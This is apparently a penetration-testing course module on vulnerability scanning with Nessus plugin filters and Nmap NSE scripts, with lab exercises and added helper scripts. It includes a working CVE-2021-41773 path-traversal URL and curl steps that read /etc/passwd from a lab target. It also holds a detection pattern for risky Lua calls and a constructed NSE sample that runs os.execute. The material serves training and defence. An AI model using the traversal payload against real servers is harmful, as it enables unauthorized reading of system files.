Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Vulnerability Scanning - Authenticated Scan - VM #1

Labs

  1. Follow the steps above to perform an authenticated vulnerability scan on VM #1. Review the results of the scan and analyze the "Patch Report" finding. The report identifies missing patches, with one specifically related to the Heimdal package. Can you provide the corresponding Ubuntu Security Notice (USN) number?
  2. Additionally, analyze the "OS Identification and Installed Software Enumeration over SSH v2 (Using New SSH Library)" finding. The finding includes the output of the uname -a command. What is the kernel version of the DESKTOP system?

7.2.6. Working with Nessus Plugins

By default, Nessus will enable several plugins behind the scenes when running a default template. While this is certainly useful in many scenarios, we can also fine-tune our options to quickly run a single plugin. We can use this feature to validate a previous finding or to quickly discover all the targets in an environment that are at risk of a specific vulnerability.

For this example, we will set a plugin filter to identify if the DESKTOP machine is vulnerable to CVE-2021-3156. This is a locally exploitable vulnerability that allows an unprivileged user to elevate privileges to root.

To leverage the dynamic plugin filter, we will once again begin with a New Scan.

Figure 36: Creating a new Scan

This time, we will use the Advanced Dynamic Scan template. This template allows us to use a dynamic plugin filter instead of manually enabling or disabling plugins.

To use this template, we click on Advanced Dynamic Scan.

Figure 37: Select Advanced Dynamic Scan

Once again, we'll configure the name and target.

Figure 38: Enter Name and Target

Next, we'll provide the same SSH and sudo credentials we used in the last example, meaning we'll also be conducting an authenticated scan.

Now we can select the plugins we want to use in our vulnerability scan. As stated before, the Advanced Dynamic Scan allows us to use a filter instead of enabling or disabling groups or individual plugins.

To do so, let's click on the Dynamic Plugins tab. In the left dropdown menu, we'll select CVE to filter for a specific CVE. In the middle dropdown menu, we can choose from different filter arguments to specify the matching behavior. On the right dropdown menu, we can specify a CVE number. After entering "CVE-2021-3156", we can click on Preview Plugins. This may take a few minutes to complete.

Figure 39: Filter for specific Plugins

Once Preview Plugins is finished running, we get a list of found plugin families that cover this particular CVE.

Figure 40: Select Family of Plugins covering CVE-2021-3156

One very handy feature of the dynamic plugin filter is the ability to combine multiple filters. In this example, we know that the target is an Ubuntu Linux system and we can therefore use a second filter to specify the related plugin family. Let's add a new filter by clicking on the plus button next to the first filter.

Figure 41: Add Filter

A new plugin filter appears. To restrict the plugin family to specific checks for Ubuntu, let's select Plugin Family on the left dropdown and Ubuntu Local Security Checks on the right dropdown.

Figure 42: Combined Plugin Filters

Depending on the version of Nessus, the dropdown menu on the right may not display any values. In this case, we can remove the second plugin filter and proceed without it.

We can then click on Preview Plugins again to list the plugins determined by our filters. After it completes, let's click on the dropdown and choose Ubuntu Local Security Checks. Nessus displays information about the plugin, including affected Ubuntu versions, a short description, and patch number, as well as the Plugin ID.

Figure 43: Ubuntu Local Security Check Plugin for CVE-2021-3156

We can get more information by clicking on the plugin. Figure 44 shows the detailed information of the specified plugin.

Figure 44: Detailed Information of Plugin 145463

After closing this window, we can launch the vulnerability scan as we did before.

Once the scan is finished, let's review the results by clicking on the Vulnerabilities tab.

Figure 45: Listed Findings of the Advanced Dynamic Scan

The output lists one finding with a HIGH severity, which was found by the plugin we specified with our dynamic plugin filter. Figure 46 shows the detailed information of the finding, confirming that the target is vulnerable to CVE-2021-3156.

Figure 46: Detailed Information about the Findings of the specified Plugins

The plugin output also contains information stating that Nessus only used the reported version number of the affected application and that it did not try to confirm the vulnerability by exploiting it in any way. In an assessment, we should verify these kinds of results to check if it is indeed an exploitable vulnerability.

Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Vulnerability Scanning - Working with Nessus Plugins - VM #1
Vulnerability Scanning - Working with Nessus Plugins - VM #2

Labs

  1. Follow the steps above to perform the vulnerability scan on VM #1 with the specified plugin filter. Click on the vulnerability provided by the plugin on the Vulnerabilities result page and enter the date when a patch for this vulnerability was published. The information can be found in the Vulnerability Information area under the Patch Pub Date on the right sidebar.
  2. The target machine VM #2 is running an IIS web server. Perform an Advanced Dynamic Scan on this system with the default settings of this template and specify the Plugin ID 11714 in a Plugin Filter. Once the scan completes, examine the discovered information and locate the flag embedded in the disclosed path. Keep in mind that Nessus shows some special characters like "{" or "}" as Unicode Hex characters. To provide the correct flag, you will need to substitute these characters.

7.3. Vulnerability Scanning with Nmap

This Learning Unit covers the following Learning Objectives:

  • Understand the basics of the Nmap Scripting Engine (NSE)
  • Perform a lightweight Vulnerability Scan with Nmap
  • Work with custom NSE scripts

In this Learning Unit, we will explore the Nmap Scripting Engine (NSE) and how to leverage Nmap as a lightweight vulnerability scanner. In addition, we will learn about the NSE script categories, how to use NSE scripts in Nmap, and how to work with custom NSE scripts.

7.3.1. NSE Vulnerability Scripts

As an alternative to Nessus, we can also use the NSE to perform automated vulnerability scans. NSE scripts extend the basic functionality of Nmap to do a variety of networking tasks. These tasks are grouped into categories around cases such as vulnerability detection, brute forcing, and network discovery. The scripts can also extend the version detection and information-gathering capabilities of Nmap.

An NSE script can have more than one category. For example, it can be categorized as safe and vuln, or intrusive and vuln. Scripts categorized as "safe" have no potential impact to stability, while scripts in the "intrusive" category might crash a target service or system. To avoid any stability issues, it's imperative to check how the scripts are categorized and we should never run an NSE script or category without understanding the implications. We can determine the categories of a script by browsing the NSE Documentation or locally in the NSE scripts directory.

In this section, we will focus on the vuln category to leverage Nmap as a lightweight vulnerability scanner.

On our Kali VM, the NSE scripts can be found in the /usr/share/nmap/scripts/ directory with the .nse filetype. This directory also contains the script.db file, which serves as an index to all currently available NSE scripts. We can use it to get a list of scripts in the vuln category.

kali@kali:~$ cd /usr/share/nmap/scripts/

kali@kali:/usr/share/nmap/scripts$ cat script.db  | grep "\"vuln\""
Entry { filename = "afp-path-vuln.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "broadcast-avahi-dos.nse", categories = { "broadcast", "dos", "intrusive", "vuln", } }
Entry { filename = "clamav-exec.nse", categories = { "exploit", "vuln", } }
Entry { filename = "distcc-cve2004-2687.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "dns-update.nse", categories = { "intrusive", "vuln", } }
...

Listing 4 - The Nmap script database

Each entry has a file name and categories. The file name represents the name of the NSE script in the NSE directory.

Some of the standard NSE scripts are quite outdated. Fortunately, the vulners script was integrated, which provides current vulnerability information about detected service versions from the Vulners Vulnerability Database. The script itself has the categories safe, vuln, and external.

Before we start our first vulnerability scan with the NSE, we will examine the Nmap --script parameter. This parameter determines which NSE scripts get executed in a scan. The arguments for this parameter can be a category, a Boolean expression, a comma-separated list of categories, the full or wildcard-specified name of an NSE script in script.db, or an absolute path to a specific script.
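Since the categories in script.db are what tell us whether a script is safe or intrusive before we run it, it helps to be able to query that index the way the --script parameter does. The following is an added example (not code from the course or from the Nmap project) that parses entries in the Listing 4 format and evaluates a category expression using the and/or/not/parenthesis syntax nmap accepts; it is limited to category names (no script-name wildcards) and runs on a constructed sample of script.db entries.

```python
"""Select NSE scripts from script.db by category expression (added example)."""
import re
from typing import Dict, List, Set

# Constructed sample in the same Lua-table format as the real script.db.
SAMPLE_SCRIPT_DB = '''
Entry { filename = "afp-path-vuln.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "broadcast-avahi-dos.nse", categories = { "broadcast", "dos", "intrusive", "vuln", } }
Entry { filename = "clamav-exec.nse", categories = { "exploit", "vuln", } }
Entry { filename = "distcc-cve2004-2687.nse", categories = { "exploit", "intrusive", "vuln", } }
Entry { filename = "dns-update.nse", categories = { "intrusive", "vuln", } }
Entry { filename = "vulners.nse", categories = { "vuln", "safe", "external", } }
Entry { filename = "http-title.nse", categories = { "default", "discovery", "safe", } }
'''

_ENTRY_RE = re.compile(
    r'Entry\s*\{\s*filename\s*=\s*"([^"]+)"\s*,\s*categories\s*=\s*\{([^}]*)\}'
)


def parse_script_db(text: str) -> Dict[str, Set[str]]:
    """Map each script filename to the set of categories listed for it."""
    scripts: Dict[str, Set[str]] = {}
    for match in _ENTRY_RE.finditer(text):
        categories = set(re.findall(r'"([^"]+)"', match.group(2)))
        scripts[match.group(1)] = categories
    return scripts


# Tokens: parentheses, keywords (and/or/not) and bare category names.
_TOKEN_RE = re.compile(r"\(|\)|[A-Za-z0-9_-]+")


class _ExprParser:
    """Recursive-descent evaluator for expressions like 'vuln and not intrusive'."""

    def __init__(self, expr: str, categories: Set[str]) -> None:
        self.tokens = _TOKEN_RE.findall(expr)
        self.pos = 0
        self.categories = categories

    def peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None

    def take(self):
        token = self.peek()
        self.pos += 1
        return token

    def expr(self) -> bool:  # or-expression (lowest precedence)
        value = self.term()
        while self.peek() == "or":
            self.take()
            rhs = self.term()  # always consume the right-hand side
            value = value or rhs
        return value

    def term(self) -> bool:  # and-expression
        value = self.factor()
        while self.peek() == "and":
            self.take()
            rhs = self.factor()
            value = value and rhs
        return value

    def factor(self) -> bool:  # not / parenthesised group / category name
        token = self.take()
        if token == "not":
            return not self.factor()
        if token == "(":
            value = self.expr()
            if self.take() != ")":
                raise ValueError("missing ')' in category expression")
            return value
        if token is None or token in (")", "and", "or"):
            raise ValueError(f"unexpected token {token!r} in category expression")
        return token in self.categories  # a bare word is a category name


def matches(categories: Set[str], expr: str) -> bool:
    """True if the script's categories satisfy the Boolean category expression."""
    parser = _ExprParser(expr, categories)
    result = parser.expr()
    if parser.peek() is not None:
        raise ValueError(f"trailing token {parser.peek()!r} in category expression")
    return result


def select_scripts(db: Dict[str, Set[str]], expr: str) -> List[str]:
    """Sorted filenames of all scripts whose categories match the expression."""
    return sorted(name for name, cats in db.items() if matches(cats, expr))


if __name__ == "__main__":
    db = parse_script_db(SAMPLE_SCRIPT_DB)
    for expression in ("vuln", "vuln and not intrusive", "(vuln or discovery) and safe"):
        print(f"{expression}: {select_scripts(db, expression)}")
```

Pointing parse_script_db at the real /usr/share/nmap/scripts/script.db shows which scripts a given --script expression would actually run before launching the scan.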

Let's start with an Nmap scan using all of the NSE scripts in the vuln category. The command contains the --script parameter with the vuln argument, which selects every script with that category. We also pass -sV to enable service and version detection, which the vulners script depends on, and -p to scan only port 443.

kali@kali:~$ sudo nmap -sV -p 443 --script "vuln" 192.168.50.124
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org )
...
PORT    STATE SERVICE VERSION
443/tcp open  http    Apache httpd 2.4.49 ((Unix))
...
| vulners: 
|   cpe:/a:apache:http_server:2.4.49:
...
        https://vulners.com/githubexploit/DF57E8F1-FE21-5EB9-8FC7-5F2EA267B09D	*EXPLOIT*
|     	CVE-2021-41773	4.3	https://vulners.com/cve/CVE-2021-41773
...
|_http-server-header: Apache/2.4.49 (Unix)
MAC Address: 00:0C:29:C7:81:EA (VMware)

Listing 5 - Using NSE's "vuln" category scripts against the SAMBA machine

Nmap detected Apache httpd 2.4.49 and ran all of the NSE scripts from the vuln category against the port. Most of the output comes from the vulners script, which uses the detected service and version to look up related vulnerability data.

The vulners script shows not only the CVEs it found but also their CVSS scores and links to further information. For example, Listing 5 shows that Nmap, combined with the vulners script, reports the target as vulnerable to CVE-2021-41773. Note that this is a version match rather than a test of the flaw: the script knows only that the vulnerability is recorded against Apache 2.4.49, so a target running a patched build that still announces that version would be listed too. Findings from vulners therefore need to be verified, which is what the next section does.

Another useful feature of the vulners script is that it also lists proof-of-concept exploits for the vulnerabilities it found, marked with "*EXPLOIT*" (the githubexploit entry in Listing 5 is one). However, the script keys everything on the version string: without a successful service and version detection (-sV), vulners has no CPE to look up and produces no results at all.

Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Vulnerability Scanning - NSE Vulnerability Scripts - VM #1

Labs

  1. Follow the steps above and use the vuln NSE script category against VM #1. Listing 5 shows that the target is vulnerable to CVE-2021-41773, but the redacted output omits multiple additional found CVEs. Enter one of the other found CVEs from 2021.

7.3.2. Working with NSE Scripts

In the previous section, we learned about the vuln NSE category and the vulners script. While vulners gives an overview of every CVE mapped to a detected version, we sometimes want to check for one specific CVE. This is especially useful when we want to sweep a network for the presence of a single vulnerability; doing that with vulners would leave us reviewing an enormous amount of output for every host. For many recent vulnerabilities, no check ships with Nmap, so we have to add a dedicated NSE script ourselves.

Let's practice this with CVE-2021-41773. To find a suitable NSE script, we can search for the CVE number plus NSE (CVE-2021-41773 nse).

Figure 47: Searching for an NSE script for a specific CVE in Google

One of the first results is a GitHub page providing a script that checks for this vulnerability. We download the script and save it as /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse, following the naming convention of the other NSE scripts. Before Nmap can find the script by name, we need to re-index the scripts directory with --script-updatedb, which rewrites script.db.

kali@kali:~$ sudo cp /home/kali/Downloads/http-vuln-cve-2021-41773.nse /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse

kali@kali:~$ sudo nmap --script-updatedb
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org )
NSE: Updating rule database.
NSE: Script Database updated successfully.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.54 seconds

Listing 6 - Copy the NSE Script and update the script.db database

To use the NSE script, we pass its name, without the .nse extension, to --script, along with the target and the port number. We also enable service detection.

kali@kali:~$ sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.50.124
Starting Nmap 7.92 ( https://nmap.org )
Host is up (0.00069s latency).

PORT    STATE SERVICE VERSION
443/tcp open  http    Apache httpd 2.4.49 ((Unix))
| http-vuln-cve2021-41773:
|   VULNERABLE:
|   Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49
|     State: VULNERABLE
|               A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|           
|     Disclosure date: 2021-10-05
|     Check results:
|       
|         Verify arbitrary file read: https://192.168.50.124:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
...
Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds

Listing 7 - CVE-2021-41773 NSE Script

The output reports the target as vulnerable to CVE-2021-41773 and adds background information, including a URL we can request ourselves to confirm the file read.

While Nmap is not a vulnerability scanner in the traditional sense, the NSE is a powerful feature that lets us do lightweight vulnerability scanning. In a penetration test, we can use Nmap when no full-fledged vulnerability scanner is available, or when we want to verify findings from other tools with a targeted check like the one above.

However, the same considerations apply as with any other vulnerability scanner. The NSE categories tell us useful things, such as whether a script is intrusive or safe, but an NSE script is Lua code that runs on our own machine with the privileges of the nmap process (root, when we run it with sudo as above). A malicious script could therefore give its author full access to our system. Before installing a third-party script we always need to verify that it not only provides the needed functionality but is also safe: read it, and treat any call that runs commands or touches local files as a reason not to install it.
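One way to act on that last point, added here as an example and not part of the course or of Nmap: a small pre-install review that runs before the sudo cp and nmap --script-updatedb steps of Listing 6. It shows the categories a downloaded script declares and flags Lua calls that execute commands or touch files on the scanning host, which a vulnerability check never needs to do. The list of flagged calls is an assumption for this example and a clean result is not proof of safety; both .nse files inside the block are constructed to demonstrate the check, and the function name is this example's own.

```shell
#!/usr/bin/env bash
# Added example, not OffSec course material: a pre-install review of a
# downloaded NSE script. It prints the categories the script declares and
# flags Lua calls that run commands or touch files on the *scanning* host,
# which a vulnerability check has no reason to make. The pattern list is an
# assumption for this example: a hit is a reason to read that line, a clean
# run is not proof the script is harmless. The two .nse files below are
# constructed here so the example runs stand-alone.
set -eu

# Lua calls that act on the local machine rather than the target. Legitimate
# checks use Nmap's own libraries (http, shortport, vulns, ...) instead.
NSE_RISKY='os\.(execute|remove|rename|tmpname|getenv)|io\.(popen|open|lines|output)|loadstring|dofile'

# nse_audit SCRIPT
#   0: declares categories and contains no flagged call
#   1: at least one flagged call (each printed with its line number)
#   2: not readable, or no categories table (not a usable NSE script)
nse_audit() {
    local script="$1" hits
    [ -r "$script" ] || { echo "not readable: $script" >&2; return 2; }
    grep -q '^categories *=' "$script" || { echo "no categories table: $script" >&2; return 2; }
    echo "== $script"
    grep -m1 '^categories *=' "$script"
    hits="$(grep -nE "$NSE_RISKY" "$script" || true)"
    if [ -n "$hits" ]; then
        printf 'FLAGGED:\n%s\n' "$hits"
        return 1
    fi
    echo "no local command or file access found"
}

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Constructed: the shape of a well-behaved HTTP check (talks only to the target).
NSE_GOOD="$WORK/http-vuln-example-good.nse"
cat > "$NSE_GOOD" <<'EOF'
description = [[Constructed example: requests one path and reports the status.]]
categories = { "vuln", "safe" }
local http = require "http"
local shortport = require "shortport"
portrule = shortport.http
action = function(host, port)
  local resp = http.get(host, port, "/")
  return resp and ("status " .. resp.status) or nil
end
EOF

# Constructed: same categories, but runs a command on the machine doing the
# scan (as root, if nmap was started with sudo).
NSE_BAD="$WORK/http-vuln-example-bad.nse"
cat > "$NSE_BAD" <<'EOF'
description = [[Constructed example of a script that must not be installed.]]
categories = { "vuln", "safe" }
local shortport = require "shortport"
portrule = shortport.http
action = function(host, port)
  os.execute("id >> /tmp/nse-audit-demo")
  return "VULNERABLE"
end
EOF

nse_audit "$NSE_GOOD"
nse_audit "$NSE_BAD" || echo "verdict: do not copy into /usr/share/nmap/scripts"
# Only after a clean review and a read-through:
#   sudo cp script.nse /usr/share/nmap/scripts/ && sudo nmap --script-updatedb
```

Note that the second script declares itself safe; the categories are whatever the author typed, so they say nothing about what the code does. The grep is a first filter only: Lua can build these calls dynamically, so a script that passes it still has to be read before it goes into the scripts directory.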

Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Vulnerability Scanning - Working with NSE Scripts - VM #1

Labs

  1. Capstone Labs: Follow the steps above to perform the vulnerability scan with the custom NSE script on VM #1. Copy the link from the script output after Verify arbitrary file read: and use it as a parameter for curl. This will retrieve the content of /etc/passwd from the target machine and display it. Be aware that you need to use http instead of https while keeping port 443 when you paste the link: Nmap identified the service on 443 as plain http rather than ssl/http, and the script only assumed https from the port number. Embed the last username of the file in the braces of "OS{}" and provide it as the answer to this exercise.
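As an added example (not course material), the following shell functions do the copy-and-rewrite step of this lab from a saved scan: they confirm that the script block reports State: VULNERABLE, extract the verification URL, and print the curl command with the scheme corrected to http and the port kept. The scan excerpt inside the block is constructed from Listing 7, and the function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not OffSec course material: turn the Listing 7 output into the
# verification request the lab asks for. nse_verify_url reads a saved Nmap
# normal-output file (-oN), requires "State: VULNERABLE" and extracts the
# "Verify arbitrary file read:" URL; nse_verify_cmd rewrites the scheme to
# http while keeping :443 (Nmap identified the service as plain http, not
# ssl/http; the script only assumed https from the port number) and prints a
# curl command with --path-as-is so curl does not normalise the traversal
# segments before sending. SCAN_OUT is a constructed excerpt of Listing 7; the
# target is never contacted unless the printed command is run.
set -eu

# nse_verify_url FILE
#   prints the verify URL and returns 0 when the script block says VULNERABLE;
#   returns 1 and prints nothing for any other state or when no URL is present.
nse_verify_url() {
    awk '
    /State: VULNERABLE/ { vulnerable = 1 }
    /Verify arbitrary file read:/ { url = $NF }
    END {
        if (vulnerable && url != "") { print url; exit 0 }
        exit 1
    }' "$1"
}

# nse_verify_cmd URL
#   https://host:port/path -> curl --path-as-is -s http://host:port/path
nse_verify_cmd() {
    local url="$1"
    url="${url#https://}"
    url="${url#http://}"
    printf 'curl --path-as-is -s %s\n' "http://$url"
}

# Constructed excerpt of the Listing 7 output, as nmap -oN would save it.
SCAN_OUT="$(mktemp)"
trap 'rm -f "$SCAN_OUT"' EXIT
cat > "$SCAN_OUT" <<'EOF'
PORT    STATE SERVICE VERSION
443/tcp open  http    Apache httpd 2.4.49 ((Unix))
| http-vuln-cve2021-41773:
|   VULNERABLE:
|   Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49
|     State: VULNERABLE
|     Disclosure date: 2021-10-05
|     Check results:
|         Verify arbitrary file read: https://192.168.50.124:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
EOF

if url="$(nse_verify_url "$SCAN_OUT")"; then
    nse_verify_cmd "$url"          # run the printed command against the lab target
else
    echo "script did not report the target as vulnerable"
fi
```

Save the real scan with -oN scan.txt, run nse_verify_url scan.txt, and execute the printed command; appending | cut -d: -f1 | tail -1 prints the last username the lab asks for. The segments here are percent-encoded and survive curl's normal path cleanup, but a verification URL with a literal /../ would not, which is why --path-as-is belongs in the command.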

7.4. Wrapping Up

This Module has provided an overview of vulnerability scanning with Nessus and Nmap, and it provided insight into the different types and considerations of a vulnerability scan.

Vulnerability scanning can be extremely helpful during any kind of security assessment. Configured correctly, vulnerability scanning tools provide a wealth of meaningful data. It is important to understand that a manual review of the results is still required and that scanners can only discover vulnerabilities that they are configured for. Finally, we should always keep in mind that vulnerability scanning tools can perform actions that could be detrimental to some networks or targets, so we must exercise caution when using them.
